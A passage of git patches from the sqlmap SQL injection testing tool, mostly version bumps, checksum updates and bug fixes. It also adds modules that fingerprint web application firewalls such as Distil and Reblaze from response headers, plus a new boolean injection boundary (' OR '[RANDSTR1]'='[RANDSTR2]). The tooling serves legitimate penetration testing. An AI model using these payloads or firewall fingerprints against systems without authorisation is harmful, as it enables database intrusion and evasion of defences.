tamper/ifnull2casewhenisnull.py +6e3ab1cf4ccf5524dcb60e390f920b60 tamper/ifnull2ifisnull.py +3ed2c6299c7c94776306535ff6090ab3 tamper/informationschemacomment.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py -1834b5409c449d2ea1b70a5038fed9eb tamper/lowercase.py +40d1ea0796fd91cb3cdd602e36daed15 tamper/lowercase.py 1c4d622d1c2c77fc3db1f8b3849467ee tamper/modsecurityversioned.py f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py 91b63afdb96b1d51c12a14cbd425d310 tamper/multiplespaces.py efd1917c6ccc632f044084a30e0e0f98 tamper/nonrecursivereplacement.py -95bf07047343c68a05658f5f11c6b413 tamper/overlongutf8more.py -db4687249dedddbe057c8b163923ef01 tamper/overlongutf8.py -bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py -db9cd6325d1814e5fe88323fe4add4e1 tamper/plus2concat.py -bcad55e2f7ce3e58a4cc7fcef77d4a4a tamper/plus2fnconcat.py -e94a1c7e4dc7450ac224436269d823bb tamper/randomcase.py -e50d9ed1c988638899cf82f18452e96c tamper/randomcomments.py +dcf3458f9010ca41bc4b56804f15792c tamper/overlongutf8more.py +a3a3cef042b864c4226b63f89548f939 tamper/overlongutf8.py +89f8753a0ef65d2bb860c8864e9e935a tamper/percentage.py +a47aafcbc1de2deb85160e29de46f748 tamper/plus2concat.py +759b86cf3bb1d7871dc6489538253f94 tamper/plus2fnconcat.py +078494e1217400b485ef653108d32699 tamper/randomcase.py +28626e4b8c673228dcfe4f1627a9e08b tamper/randomcomments.py 938bfac6e55a8823e4a66cd29166d980 tamper/securesphere.py cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py -62d4d07b640d9d54d26ba33a77de9474 tamper/space2dash.py -ab91c20f71973b1a9a5fecfb9f2a1d1f tamper/space2hash.py -18f827afce8322adfa0c6dfbb4a59379 tamper/space2morecomment.py -59e61a9dd1f1e6b79fde026ed771cac4 tamper/space2morehash.py -ad45e799126d2d563b3958f714d2e7c6 tamper/space2mssqlblank.py -74334d72bffb99b0ac092f87f4da2675 tamper/space2mssqlhash.py -fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py -48a1f013657186e336d249adefbdbc7b tamper/space2mysqldash.py +4e6da2aca962b6110652e5f83dce5cd7 tamper/space2dash.py +7cdbae483262f66ef5d77521c59d9621 tamper/space2hash.py +f3fed47a4fccb2b482f1f01559b8f55a tamper/space2morecomment.py +fc3d9896cac8f4a97efd39673fadca7b tamper/space2morehash.py +b55ed15af74ffefc4dc303646c7c6482 tamper/space2mssqlblank.py +64e3d97e22f7e0870e88a87fd2f64243 tamper/space2mssqlhash.py +3ef95855a38bbc0f031ae3a992dcbf52 tamper/space2mysqlblank.py +8a4737f853354ac9c3788278589a772a tamper/space2mysqldash.py 72a547bc3bf32dba0d1c3093988df8af tamper/space2plus.py -6ce135f89259c379d84c85e538300091 tamper/space2randomblank.py +a74cd6375c5d5d253e2e7014b00ecd33 tamper/space2randomblank.py 93fc10b57586936cef05e88227c84ad0 tamper/sp_password.py 041cb567dff6bb6e7389e12ab3fb84c6 tamper/symboliclogical.py -6459c62914ae643799667de8bd283c97 tamper/unionalltounion.py +6679c4ffb7322315a738dcfa68c6fb7c tamper/unionalltounion.py 51d20b5cb5a50fc2e44d39087f865d23 tamper/unmagicquotes.py -371afb396f0bb18d97147c5db83354f4 tamper/uppercase.py -557ce5bf5ae9b7ab26f2c6b57312f41a tamper/varnish.py -929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py -3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py -ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py +cc212839f55692d422beef3a8e22a8d4 tamper/uppercase.py +f2b9eac52d346315f5705f71beeda791 tamper/varnish.py +0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py +0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py +de532c4e3160039335010c499129d54f tamper/xforwardedfor.py b25b47ddeeb62e5857fd5ad17fd454b5 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py From af89137f2cbe54cb7b0f77a2997ce9cf6bf2e46e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 5 Aug 2018 14:19:27 +0200 Subject: [PATCH 221/428] Update of WAF scripts --- lib/core/settings.py | 2 +- txt/checksum.md5 | 10 ++++++---- waf/cloudflare.py | 2 +- waf/distil.py | 24 ++++++++++++++++++++++++ waf/incapsula.py | 1 + waf/reblaze.py | 25 +++++++++++++++++++++++++ waf/sucuri.py | 2 ++ 7 files changed, 60 insertions(+), 6 deletions(-) create mode 100644 waf/distil.py create mode 100644 waf/reblaze.py diff --git a/lib/core/settings.py b/lib/core/settings.py index 93ae43a1f30..3e54a786d8d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.28" +VERSION = "1.2.8.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 65185f6f709..f349a738e45 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b0c61c78049b4e342aeafd2fc85430fe lib/core/settings.py +355a1680a1f53013390849ca50322c0e lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -402,11 +402,12 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py -21b8203fdaaaac3cb7c84fa4dc0627f6 waf/cloudflare.py +feda0f2a5172325f39e8e3e38c45f73d waf/cloudflare.py b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py 56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py 1538b661e35843074f4599be93b3fae9 waf/denyall.py +0182d23b34cf903537f77f4ec4b144bf waf/distil.py aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py 357cbc0a17a44e4f64062b799c718e0b waf/dotdefender.py 7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py @@ -414,7 +415,7 @@ aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py eb56ac34775cc3c5f721ec967d04b283 waf/generic.py 1c70655551b8296ceeb19292a342e620 waf/hyperguard.py -525483047474e6f15d9898b525bdafd3 waf/incapsula.py +2a52c09e4ce1f2a5976ce53b415ef496 waf/incapsula.py 1e5532ede194ac9c083891c2f02bca93 waf/__init__.py 30ae98958fb35061d9a4145cc74c0489 waf/isaserver.py 5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py @@ -430,6 +431,7 @@ ad7fe23004f8e0d02534c7baa877add3 waf/paloalto.py 856e34d47fedfe96039a6a7807f9605a waf/profense.py 166eb53544536e3e86223d513b8b688d waf/proventia.py 78a40eca7ddd14c4eaf911de7748b487 waf/radware.py +67864bf5e5a38cb27b5daf3581282f9e waf/reblaze.py f5d53758d2008195609557112ce8e895 waf/requestvalidationmode.py acb82b21f4032ceb510a58142add02ab waf/safe3.py 67cdf508e7b1f69ddf622a87e0e5e4e8 waf/safedog.py @@ -439,7 +441,7 @@ d1b67820442199181815ec3fce27e582 waf/secureiis.py b088cf83c1a681d143e7eaea43f52b80 waf/sonicwall.py 4c412bc70007e6108d109e2911f2cefe waf/sophos.py 0e244e097a648158948dc8bb2351c781 waf/stingray.py -d5a5cef222f0e27f47bec3c4228e255e waf/sucuri.py +9da254a2dfe22539c90bc1db0643489e waf/sucuri.py 46224e3fa4b819da227c50fd45155823 waf/tencent.py dffa9cebad777308714aaf83b71635b4 waf/teros.py b37210459a13de40bf07722c4d032c33 waf/trafficshield.py diff --git a/waf/cloudflare.py b/waf/cloudflare.py index 5712f0957f7..7e738bb4726 100644 --- a/waf/cloudflare.py +++ b/waf/cloudflare.py @@ -17,7 +17,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, headers, code = get_page(get=vector) - retval = re.search(r"cloudflare-nginx", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None + retval = re.search(r"cloudflare", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None if code >= 400: retval |= re.search(r"\A__cfduid=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None diff --git a/waf/distil.py b/waf/distil.py new file mode 100644 index 00000000000..25e1908d865 --- /dev/null +++ b/waf/distil.py @@ -0,0 +1,24 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import HTTP_HEADER +from lib.core.settings import WAF_ATTACK_VECTORS + +__product__ = "Distil Web Application Firewall Security (Distil Networks)" + +def detect(get_page): + retval = False + + for vector in WAF_ATTACK_VECTORS: + _, headers, _ = get_page(get=vector) + retval = headers.get("x-distil-cs") is not None + if retval: + break + + return retval diff --git a/waf/incapsula.py b/waf/incapsula.py index f2bc0b5de7b..e08ba65df8f 100644 --- a/waf/incapsula.py +++ b/waf/incapsula.py @@ -20,6 +20,7 @@ def detect(get_page): retval = re.search(r"incap_ses|visid_incap", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None retval |= re.search(r"Incapsula", headers.get("X-CDN", ""), re.I) is not None retval |= "Incapsula incident ID" in (page or "") + retval |= headers.get("X-Iinfo") is not None if retval: break diff --git a/waf/reblaze.py b/waf/reblaze.py new file mode 100644 index 00000000000..6226f4fca7f --- /dev/null +++ b/waf/reblaze.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import HTTP_HEADER +from lib.core.settings import WAF_ATTACK_VECTORS + +__product__ = "Reblaze Web Application Firewall (Reblaze)" + +def detect(get_page): + retval = False + + for vector in WAF_ATTACK_VECTORS: + _, headers, _ = get_page(get=vector) + retval = re.search(r"\Arbzid=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None + retval |= re.search(r"Reblaze Secure Web Gateway", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None + if retval: + break + + return retval diff --git a/waf/sucuri.py b/waf/sucuri.py index 7b1eb4cc8b7..636008f74d2 100644 --- a/waf/sucuri.py +++ b/waf/sucuri.py @@ -21,6 +21,8 @@ def detect(get_page): retval |= "Access Denied - Sucuri Website Firewall" in (page or "") retval |= "Sucuri WebSite Firewall - CloudProxy - Access Denied" in (page or "") retval |= re.search(r"Questions\?.+cloudproxy@sucuri\.net", (page or "")) is not None + retval |= headers.get("X-Sucuri-ID") is not None + retval |= headers.get("X-Sucuri-Cache") is not None if retval: break From b0ca52086a1aa6c71797c429a4f827dd70146766 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 7 Aug 2018 23:35:58 +0200 Subject: [PATCH 222/428] Fixes #3202 --- lib/core/common.py | 6 +++--- lib/core/settings.py | 2 +- lib/techniques/blind/inference.py | 4 ++-- txt/checksum.md5 | 6 +++--- 4 files changed, 9 insertions(+), 9 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 885cdaac53d..c1271be4c52 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2908,15 +2908,15 @@ def filterStringValue(value, charRegex, replacement=""): return retVal -def filterControlChars(value): +def filterControlChars(value, replacement=' '): """ - Returns string value with control chars being supstituted with ' ' + Returns string value with control chars being supstituted with replacement character >>> filterControlChars(u'AND 1>(2+3)\\n--') u'AND 1>(2+3) --' """ - return filterStringValue(value, PRINTABLE_CHAR_REGEX, ' ') + return filterStringValue(value, PRINTABLE_CHAR_REGEX, replacement) def isDBMSVersionAtLeast(version): """ diff --git a/lib/core/settings.py b/lib/core/settings.py index 3e54a786d8d..592795b7fa7 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.0" +VERSION = "1.2.8.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 4dca1afb4e2..484666e0cfe 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -501,7 +501,7 @@ def blindThread(): count = threadData.shared.start for i in xrange(startCharIndex, endCharIndex + 1): - output += '_' if currentValue[i] is None else currentValue[i] + output += '_' if currentValue[i] is None else filterControlChars(currentValue[i] if len(currentValue[i]) == 1 else ' ', replacement=' ') for i in xrange(length): count += 1 if currentValue[i] is not None else 0 @@ -518,7 +518,7 @@ def blindThread(): status = ' %d/%d (%d%%)' % (_, length, int(100.0 * _ / length)) output += status if _ != length else " " * len(status) - dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(output))) + dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), output)) runThreads(numThreads, blindThread, startThreadMsg=False) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f349a738e45..7330bb9d544 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -ee1b800e860263b877a2b292a3e4becd lib/core/common.py +655326aed648209c5477464825cebea8 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -355a1680a1f53013390849ca50322c0e lib/core/settings.py +63ca523cd15143c4c0dc1ee2d307dfa6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -89,7 +89,7 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py -0e9d37cbeabd1bbbfe2c53f01bbb6a6e lib/techniques/blind/inference.py +db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py From df977d93d481d2ce48ca85071cc1a47009b66bbe Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 9 Aug 2018 15:08:21 +0200 Subject: [PATCH 223/428] Fixes #3204 --- lib/core/settings.py | 4 ++-- txt/checksum.md5 | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 592795b7fa7..7e0ec6ca79e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.1" +VERSION = "1.2.8.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -406,7 +406,7 @@ REFLECTED_BORDER_REGEX = r"[^A-Za-z]+" # Regular expression used for replacing non-alphanum characters -REFLECTED_REPLACEMENT_REGEX = r".+" +REFLECTED_REPLACEMENT_REGEX = r"[^\n]{1,100}" # Maximum time (in seconds) spent per reflective value(s) replacement REFLECTED_REPLACEMENT_TIMEOUT = 3 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7330bb9d544..fe043b2641c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -63ca523cd15143c4c0dc1ee2d307dfa6 lib/core/settings.py +d4884a7b0a93931bc37783e62162d8bb lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py From 9e002028232949eb6044ee55d367707e40d099eb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 9 Aug 2018 15:39:37 +0200 Subject: [PATCH 224/428] Minor patch (use redirection code for comparison) --- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7e0ec6ca79e..781a72dcccc 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.2" +VERSION = "1.2.8.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 612970b4899..5a3a267d9c3 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -490,7 +490,7 @@ class _(dict): page = Connect._connReadProxy(conn) if not skipRead else None if conn: - code = conn.code + code = (code or conn.code) if conn.code == kb.originalCode else conn.code # do not override redirection code (for comparison purposes) responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() else: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fe043b2641c..587d73a15a4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d4884a7b0a93931bc37783e62162d8bb lib/core/settings.py +a56c2a90533ae494cd72e817d84a6c46 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -70,7 +70,7 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -039f0f7cf997856fa2f6e8d5d69f7ae9 lib/request/connect.py +e284905d23658b85e94a5dd37bfb80b2 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 75a64245c5e49d2d3d7524436772d65f04437237 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 9 Aug 2018 16:21:04 +0200 Subject: [PATCH 225/428] Minor patch for colorization (multiple quoted strings in same line) --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 20 ++++++++++---------- txt/checksum.md5 | 6 +++--- 3 files changed, 14 insertions(+), 14 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 781a72dcccc..d219d4a8b20 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.3" +VERSION = "1.2.8.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 346e0d3cb3d..1b91ccaab4b 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -181,16 +181,16 @@ def colorize(self, message, levelno): reset = self.reset message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) - match = re.search(r"'([^']+)'", message) # single-quoted - if level != "PAYLOAD" and match: - string = match.group(1) - if not message.endswith(self.reset): - reset = self.reset - elif self.bold in message: # bold - reset = self.reset + self.bold - else: - reset = self.reset - message = message.replace(string, ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) + if level != "PAYLOAD": + for match in re.finditer(r"'([^']+)'", message): # single-quoted + string = match.group(1) + if not message.endswith(self.reset): + reset = self.reset + elif self.bold in message: # bold + reset = self.reset + self.bold + else: + reset = self.reset + message = message.replace(string, ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) else: message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset)) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 587d73a15a4..c8d6f4583bd 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a56c2a90533ae494cd72e817d84a6c46 lib/core/settings.py +9253fffb810752d130525dde8668c06a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -285,7 +285,7 @@ f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py de532c4e3160039335010c499129d54f tamper/xforwardedfor.py -b25b47ddeeb62e5857fd5ad17fd454b5 thirdparty/ansistrm/ansistrm.py +3f6a3d322a4629d5bbd93f43ff8e59cc thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py @@ -467,7 +467,7 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -201b8bb7888f500294a9831bb47ce7a7 xml/boundaries.xml +6debc049a8049b890ca109a731c60782 xml/boundaries.xml 0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml From ad11749b15c2b2d145e554a31c871a0d60be4142 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 9 Aug 2018 16:21:35 +0200 Subject: [PATCH 226/428] One more payload (requires usage of --code or similar) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- xml/boundaries.xml | 10 ++++++++++ 3 files changed, 12 insertions(+), 2 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d219d4a8b20..9ea537e004b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.4" +VERSION = "1.2.8.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c8d6f4583bd..a1e6367038c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9253fffb810752d130525dde8668c06a lib/core/settings.py +569498929d03e722dbfefaf65c387006 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py diff --git a/xml/boundaries.xml b/xml/boundaries.xml index 497edda8677..b61dcb6e0f2 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -310,6 +310,16 @@ Formats: # [RANDSTR] + + + + 3 + 1 + 1,2 + 2 + ' + OR '[RANDSTR1]'='[RANDSTR2] + From a296d22195709659bcae5a7ca9c126e2d5cbb833 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 10 Aug 2018 14:01:55 +0200 Subject: [PATCH 227/428] Fixes #3205 --- lib/controller/checks.py | 4 +++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 047c77a05a3..074437fce88 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -13,6 +13,7 @@ import re import socket import subprocess +import sys import tempfile import time @@ -90,6 +91,7 @@ from lib.core.settings import SLEEP_TIME_MARKER from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH from lib.core.settings import SUPPORTED_DBMS +from lib.core.settings import UNICODE_ENCODING from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import UPPER_RATIO_BOUND from lib.core.threads import getCurrentThreadData @@ -761,7 +763,7 @@ def genCmpPayload(): infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert logger.info(infoMsg) - process = subprocess.Popen(conf.alert, shell=True) + process = subprocess.Popen(conf.alert.encode(sys.getfilesystemencoding() or UNICODE_ENCODING), shell=True) process.wait() kb.alerted = True diff --git a/lib/core/settings.py b/lib/core/settings.py index 9ea537e004b..ffce4051c6f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.5" +VERSION = "1.2.8.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a1e6367038c..4673e63ee7f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 